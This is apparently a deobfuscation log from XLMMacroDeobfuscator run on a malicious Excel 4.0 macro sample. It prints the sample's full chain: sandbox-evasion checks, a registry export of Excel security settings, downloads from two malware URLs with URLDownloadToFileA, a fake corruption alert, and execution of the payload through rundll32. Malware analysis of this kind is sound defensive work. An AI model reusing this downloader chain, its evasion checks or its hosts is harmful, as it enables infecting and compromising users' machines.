dissectmalware

Deobfuscate XLS by automatically guessing the DAY(NOW())

May 26th, 2020
  1. _ _______
  2. |\ /|( \ ( )
  3. ( \ / )| ( | () () |
  4. \ (_) / | | | || || |
  5. ) _ ( | | | |(_)| |
  6. / ( ) \ | | | | | |
  7. ( / \ )| (____/\| ) ( |
  8. |/ \|(_______/|/ \|
  9. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  10. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  11. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  12. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  13. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  14. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  15. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  16. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  17.  
  18.  
  19. XLMMacroDeobfuscator(v 0.1.4) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  20.  
  21. File: C:\Users\user\Downloads\ea0268aed69cd2bd3a13c07752fa45be8ff07a0fe78b8f7b6b381f1476ad8068.xls
  22.  
  23. [Loading Cells]
  24. auto_open: auto_open->9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!$FH$49024
  25. [Starting Deobfuscation]
  26. CELL:FH49024 , FullEvaluation , SET.VALUE(GZ34749,236)
  27. CELL:FH49025 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!AB31575)
  28. CELL:AB31575 , FullEvaluation , SET.VALUE(GA65402,211.875)
  29. CELL:AB31576 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!CW39913)
  30. CELL:CW39913 , FullEvaluation , SET.VALUE(EV50779,334)
  31. CELL:CW39914 , FullEvaluation , GOTO(BT20806)
  32. CELL:BT20806 , FullEvaluation , SET.VALUE(HC57576,302)
  33. CELL:BT20807 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HF25027)
  34. CELL:HF25027 , FullEvaluation , SET.VALUE(BV11787,117)
  35. CELL:HF25028 , FullEvaluation , GOTO(U64895)
  36. CELL:U64895 , FullEvaluation , SET.VALUE(DJ10105,116)
  37. CELL:U64896 , FullEvaluation , GOTO(AZ26863)
  38. CELL:AZ26863 , FullEvaluation , SET.VALUE(DN42674,-35.75)
  39. CELL:AZ26864 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!BM901)
  40. CELL:BM901 , FullEvaluation , SET.VALUE(AO12768,-1027.5)
  41. CELL:BM902 , FullEvaluation , GOTO(P38128)
  42. CELL:P38128 , FullEvaluation , SET.VALUE(AZ43693,-164)
  43. CELL:P38129 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!BL29717)
  44. CELL:BL29717 , FullEvaluation , SET.VALUE(CK27344,-435)
  45. CELL:BL29718 , FullEvaluation , GOTO(FI19111)
  46. CELL:FI19111 , FullEvaluation , SET.VALUE(EX42303,290)
  47. CELL:FI19112 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!CK8252)
  48. CELL:CK8252 , FullEvaluation , SET.VALUE(IC64694,-764)
  49. CELL:CK8253 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HJ54663)
  50. CELL:HJ54663 , FullEvaluation , SET.VALUE(E44515,-468)
  51. CELL:HJ54664 , FullEvaluation , GOTO(GD55986)
  52. CELL:GD55986 , FullEvaluation , SET.VALUE(FK63376,486)
  53. CELL:GD55987 , FullEvaluation , GOTO(HB43627)
  54. CELL:HB43627 , FullEvaluation , SET.VALUE(EL29677,40.25)
  55. CELL:HB43628 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!EN29618)
  56. CELL:EN29618 , FullEvaluation , SET.VALUE(IU47295,400)
  57. CELL:EN29619 , FullEvaluation , GOTO(U45293)
  58. CELL:U45293 , FullEvaluation , SET.VALUE(BA22911,-154.5)
  59. CELL:U45294 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!CV54814)
  60. CELL:CV54814 , FullEvaluation , SET.VALUE(IF27108,196)
  61. CELL:CV54815 , FullEvaluation , GOTO(EO28948)
  62. CELL:EO28948 , FullEvaluation , SET.VALUE(BF54715,72)
  63. CELL:EO28949 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!DL56436)
  64. CELL:DL56436 , FullEvaluation , SET.VALUE(S9586,397)
  65. CELL:DL56437 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!GO5178)
  66. CELL:GO5178 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",GE58394)
  67. CELL:GO5179 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!GG53123)
  68. CELL:GG53123 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",AC38734)
  69. CELL:GG53124 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!IQ65374)
  70. CELL:IQ65374 , FullEvaluation , FORMULA("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",CF32458)
  71. CELL:IQ65375 , FullEvaluation , GOTO(IU37347)
  72. CELL:IU37347 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",GH50257)
  73. CELL:IU37348 , FullEvaluation , GOTO(GZ6455)
  74. CELL:GZ6455 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)",IH33823)
  75. CELL:GZ6456 , FullEvaluation , GOTO(IE48886)
  76. CELL:IE48886 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)",DE64447)
  77. CELL:IE48887 , FullEvaluation , GOTO(DL53198)
  78. CELL:DL53198 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,CLOSE(TRUE))",IB38985)
  79. CELL:DL53199 , FullEvaluation , GOTO(DQ63210)
  80. CELL:DQ63210 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,CLOSE(TRUE))",FC47525)
  81. CELL:DQ63211 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!IH10377)
  82. CELL:IH10377 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,CLOSE(TRUE))",IA57959)
  83. CELL:IH10378 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HS61022)
  84. CELL:HS61022 , FullEvaluation , FORMULA("=""EXPORT HKCU\Software\Microsoft\Office\""",DC59054)
  85. CELL:HS61023 , FullEvaluation , GOTO(HH5373)
  86. CELL:HH5373 , FullEvaluation , FORMULA("=""C:\Users\Public\62sg03z.reg""",IC44493)
  87. CELL:HH5374 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!DF39200)
  88. CELL:DF39200 , FullEvaluation , FORMULA("=R[44281]C[11]&GET.WORKSPACE(2)&""\Excel\Security ""&R[29720]C[141]&"" /y""",CR14773)
  89. CELL:DF39201 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!ED24752)
  90. CELL:ED24752 , FullEvaluation , FORMULA("=""C:\Windows\system32\reg.exe""",G59977)
  91. CELL:ED24753 , FullEvaluation , GOTO(ED40112)
  92. CELL:ED40112 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[57410]C[-93],R[12206]C[-4],0,5)",CV2567)
  93. CELL:ED40113 , FullEvaluation , GOTO(HI45029)
  94. CELL:HI45029 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R[7961]C[193])))",AR36532)
  95. CELL:HI45030 , FullEvaluation , GOTO(CA62811)
  96. CELL:CA62811 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",AR36533)
  97. CELL:CA62812 , FullEvaluation , GOTO(ID59587)
  98. CELL:ID59587 , FullEvaluation , FORMULA("=NEXT()",AR36534)
  99. CELL:ID59588 , FullEvaluation , GOTO(GW10338)
  100. CELL:GW10338 , FullEvaluation , FORMULA("=""http://xn--80agatbmcgncccbd9andd6w.xn--p1ai/wp-smart.php""",HB20930)
  101. CELL:GW10339 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!CB54789)
  102. CELL:CB54789 , FullEvaluation , FORMULA("=""http://ekhobrand.com/wp-smart.php""",CK63296)
  103. CELL:CB54790 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!IG57205)
  104. CELL:IG57205 , FullEvaluation , FORMULA("=FOPEN(R[28537]C[-9])",IL15956)
  105. CELL:IG57206 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HY35963)
  106. CELL:HY35963 , FullEvaluation , FORMULA("=FPOS(R[-26252]C[68],215)",FV42208)
  107. CELL:HY35964 , FullEvaluation , GOTO(CG48001)
  108. CELL:CG48001 , FullEvaluation , FORMULA("=FREAD(R[-6791]C[39],255)",GY22747)
  109. CELL:CG48002 , FullEvaluation , GOTO(EA7566)
  110. CELL:EA7566 , FullEvaluation , FORMULA("=FCLOSE(R[-27498]C[33])",HE43454)
  111. CELL:EA7567 , FullEvaluation , GOTO(BO62857)
  112. CELL:BO62857 , FullEvaluation , FORMULA("=FILE.DELETE(R[-966]C[-17])",IT45459)
  113. CELL:BO62858 , FullEvaluation , GOTO(HT60327)
  114. CELL:HT60327 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[-12384]C[103])),CLOSE(FALSE),)",CZ35131)
  115. CELL:HT60328 , FullEvaluation , GOTO(GS13611)
  116. CELL:GS13611 , FullEvaluation , FORMULA("=""C:\Users\Public\hhEMc6.html""",HV31307)
  117. CELL:GS13612 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!IP29050)
  118. CELL:IP29050 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-18278]C[-51],R[-19429]C[95],0,0)",EE50736)
  119. CELL:IP29051 , FullEvaluation , GOTO(DW56142)
  120. CELL:DW56142 , FullEvaluation , FORMULA("=FILES(R[29810]C[86])",EN1497)
  121. CELL:DW56143 , FullEvaluation , GOTO(M62520)
  122. CELL:M62520 , FullEvaluation , FORMULA("=IF(ISERROR(R[818]C[81]),CLOSE(FALSE),)",BK679)
  123. CELL:M62521 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!Y47838)
  124. CELL:Y47838 , FullEvaluation , FORMULA("=""C:\Users\Public\nzjB.html""",GO34148)
  125. CELL:Y47839 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!BF49093)
  126. CELL:BF49093 , FullEvaluation , FORMULA("=R[24818]C[106]&"",DllRegisterServer""",CM9330)
  127. CELL:BF49094 , FullEvaluation , GOTO(IQ22082)
  128. CELL:IQ22082 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[10964]C[104],R[24182]C[91],0,0)",DB9966)
  129. CELL:IQ22083 , FullEvaluation , GOTO(IL4450)
  130. CELL:IL4450 , FullEvaluation , FORMULA("=FILES(R[-21011]C[169])",AB55159)
  131. CELL:IL4451 , FullEvaluation , GOTO(CW20424)
  132. CELL:CW20424 , FullEvaluation , FORMULA("=IF(ISERROR(R[21824]C[-126]),,RUN(R[186]C[-126]))",EX33335)
  133. CELL:CW20425 , FullEvaluation , GOTO(L47582)
  134. CELL:L47582 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[32087]C[-126],R[2939]C[-18],0,0)",HG31209)
  135. CELL:L47583 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!K13075)
  136. CELL:K13075 , FullEvaluation , FORMULA("=ALERT(R[24873]C[159],2)",AB33521)
  137. CELL:K13076 , FullEvaluation , GOTO(FV25832)
  138. CELL:FV25832 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[30329]C[-187],R[925]C[-125],0,5)",HH8405)
  139. CELL:FV25833 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!BE2550)
  140. CELL:BE2550 , FullEvaluation , FORMULA("=CLOSE(FALSE)",B23780)
  141. CELL:BE2551 , FullEvaluation , GOTO(GE58394)
  142. CELL:GE58394 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  143. CELL:GE58395 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!AC38734)
  144. CELL:AC38734 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  145. CELL:AC38735 , FullEvaluation , GOTO(CF32458)
  146. CELL:CF32458 , FullEvaluation , "https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates"
  147. CELL:CF32459 , FullEvaluation , GOTO(GH50257)
  148. CELL:GH50257 , PartialEvaluation , APP.MAXIMIZE()
  149. CELL:GH50258 , FullEvaluation , GOTO(IH33823)
  150. CELL:IH33823 , FullEvaluation , IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
  151. CELL:IH33824 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!DE64447)
  152. CELL:DE64447 , FullEvaluation , IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)
  153. CELL:DE64448 , FullEvaluation , GOTO(IB38985)
  154. CELL:IB38985 , FullEvaluation , IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  155. CELL:IB38986 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!FC47525)
  156. CELL:FC47525 , FullEvaluation , IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  157. CELL:FC47526 , FullEvaluation , GOTO(IA57959)
  158. CELL:IA57959 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE))
  159. CELL:IA57959 , FullEvaluation , [TRUE]
  160. CELL:IA57960 , FullEvaluation , GOTO(DC59054)
  161. CELL:DC59054 , FullEvaluation , "EXPORT HKCU\Software\Microsoft\Office\"
  162. CELL:DC59055 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!IC44493)
  163. CELL:IC44493 , FullEvaluation , "C:\Users\Public\62sg03z.reg"
  164. CELL:IC44494 , FullEvaluation , GOTO(CR14773)
  165. CELL:CR14773 , FullEvaluation , "EXPORT HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security C:\Users\Public\62sg03z.reg /y"
  166. CELL:CR14774 , FullEvaluation , GOTO(G59977)
  167. CELL:G59977 , FullEvaluation , "C:\Windows\system32\reg.exe"
  168. CELL:G59978 , FullEvaluation , GOTO(CV2567)
  169. CELL:CV2567 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security C:\Users\Public\62sg03z.reg /y",0,5)
  170. CELL:CV2568 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!AR36532)
  171. CELL:AR36532 , PartialEvaluation , WHILE(ISERROR(FILES(R[7961]C[193])))
  172. CELL:AR36535 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HB20930)
  173. CELL:HB20930 , FullEvaluation , "http://xn--80agatbmcgncccbd9andd6w.xn--p1ai/wp-smart.php"
  174. CELL:HB20931 , FullEvaluation , GOTO(CK63296)
  175. CELL:CK63296 , FullEvaluation , "http://ekhobrand.com/wp-smart.php"
  176. CELL:CK63297 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!IL15956)
  177. CELL:IL15956 , PartialEvaluation , FOPEN("C:\Users\Public\62sg03z.reg")
  178. CELL:IL15957 , FullEvaluation , GOTO(FV42208)
  179. CELL:FV42208 , PartialEvaluation , FPOS("FOPEN(""C:\Users\Public\62sg03z.reg"")",215)
  180. CELL:FV42209 , FullEvaluation , GOTO(GY22747)
  181. CELL:GY22747 , PartialEvaluation , FREAD("FOPEN(""C:\Users\Public\62sg03z.reg"")",255)
  182. CELL:GY22748 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HE43454)
  183. CELL:HE43454 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\62sg03z.reg"")")
  184. CELL:HE43455 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!IT45459)
  185. CELL:IT45459 , PartialEvaluation , FILE.DELETE("C:\Users\Public\62sg03z.reg")
  186. CELL:IT45460 , FullEvaluation , GOTO(CZ35131)
  187. CELL:CZ35131 , FullBranching , IF(ISNUMBER(SEARCH("0001",R[-12384]C[103])),CLOSE(FALSE),)
  188. CELL:CZ35131 , End , [TRUE] CLOSE(FALSE)
  189. CELL:CZ35131 , FullEvaluation , [FALSE]
  190. CELL:CZ35132 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HV31307)
  191. CELL:HV31307 , FullEvaluation , "C:\Users\Public\hhEMc6.html"
  192. CELL:HV31308 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!EE50736)
  193. CELL:EE50736 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates","C:\Users\Public\hhEMc6.html",0,0)
  194. CELL:EE50737 , FullEvaluation , GOTO(EN1497)
  195. CELL:EN1497 , PartialEvaluation , FILES("C:\Users\Public\hhEMc6.html")
  196. CELL:EN1498 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!BK679)
  197. CELL:BK679 , FullBranching , IF(ISERROR(R[818]C[81]),CLOSE(FALSE),)
  198. CELL:BK679 , End , [TRUE] CLOSE(FALSE)
  199. CELL:BK679 , FullEvaluation , [FALSE]
  200. CELL:BK680 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!GO34148)
  201. CELL:GO34148 , FullEvaluation , "C:\Users\Public\nzjB.html"
  202. CELL:GO34149 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!CM9330)
  203. CELL:CM9330 , FullEvaluation , "C:\Users\Public\nzjB.html,DllRegisterServer"
  204. CELL:CM9331 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!DB9966)
  205. CELL:DB9966 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://xn--80agatbmcgncccbd9andd6w.xn--p1ai/wp-smart.php","C:\Users\Public\nzjB.html",0,0)
  206. CELL:DB9967 , FullEvaluation , GOTO(AB55159)
  207. CELL:AB55159 , PartialEvaluation , FILES("C:\Users\Public\nzjB.html")
  208. CELL:AB55160 , FullEvaluation , GOTO(EX33335)
  209. CELL:EX33335 , FullBranching , IF(ISERROR(R[21824]C[-126]),,RUN(R[186]C[-126]))
  210. CELL:EX33335 , FullEvaluation , [TRUE]
  211. CELL:EX33336 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HG31209)
  212. CELL:HG31209 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://ekhobrand.com/wp-smart.php","C:\Users\Public\nzjB.html",0,0)
  213. CELL:HG31210 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!AB33521)
  214. CELL:AB33521 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  215. CELL:AB33522 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HH8405)
  216. CELL:HH8405 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\nzjB.html,DllRegisterServer",0,5)
  217. CELL:HH8406 , FullEvaluation , GOTO(B23780)
  218. CELL:B23780 , End , CLOSE(FALSE)
  219. CELL:EX33335 , FullEvaluation , [FALSE] RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!AB33521)
  220. CELL:AB33521 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  221. CELL:AB33522 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HH8405)
  222. CELL:HH8405 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\nzjB.html,DllRegisterServer",0,5)
  223. CELL:HH8406 , FullEvaluation , GOTO(B23780)
  224. CELL:B23780 , End , CLOSE(FALSE)
  225. CELL:IA57959 , End , [FALSE] CLOSE(TRUE)
  226. [Day of Month] 5
  227. [END of Deobfuscation]
  228. time elapsed: 5.007885694503784